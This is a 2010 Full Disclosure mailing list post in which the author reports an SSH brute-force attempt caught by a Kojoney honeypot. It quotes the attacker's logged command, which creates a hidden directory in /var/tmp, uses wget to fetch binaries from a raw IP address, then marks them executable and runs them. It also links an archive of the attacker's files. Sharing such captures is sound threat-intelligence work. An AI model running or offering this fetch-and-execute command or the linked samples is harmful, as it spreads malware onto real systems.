Full Disclosure mailing list archives

SSH scans, i caught one

From: Marco van Berkum <marco () obit nl>
Date: Thu, 18 Nov 2010 13:13:58 +0100

Hi,

I got tired of all ssh scans the past few months so I've set up aKojoney honeypot

to see what the hell they were trying. This is what they try:

2010/11/17 21:22 CET [SSHChannel session (0) on SSHServicessh-connection on SSHServerTransport,27,84.51.138.193] executing command"cd /var/tmp;mkdir .scan;wgethttp://93.184.100.76:2700/pwn/syslgd;wget<https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/syslgd;wget>http://93.184.100.76:2700/pwn/ssh;chmod<https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/ssh;chmod>u+x syslgd ssh;./syslgd;rm syslgd"

So I downloaded all his files from the /pwn/ directory. The funny partis, most of them are MIPS files(?).

Also there are a lot of IRC config-like files.

For anyone who's interested, this is what they try/download the momentthey can login.

http://safu.stream-portal.org/pwnd.tgz

Have a nice day,
Marco van Berkum

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

SSH scans, i caught one Marco van Berkum (Nov 19)
- Re: SSH scans, i caught one Alan Buxey (Nov 19)
  - Re: SSH scans, i caught one Marco van Berkum (Nov 19)
    - Re: SSH scans, i caught one Julien Reveret (Nov 19)
    - Re: SSH scans, i caught one Marco van Berkum (Nov 19)
    - Re: SSH scans, i caught one Marco van Berkum (Nov 19)
- Re: SSH scans, i caught one Danijel (Nov 20)
  - Re: SSH scans, i caught one Marco van Berkum (Nov 19)
- <Possible follow-ups>
- Re: SSH scans, i caught one OrderZero (Nov 20)
  - Re: SSH scans, i caught one Marco van Berkum (Nov 20)
    - Re: SSH scans, i caught one Robin (Nov 20)

(Thread continues...)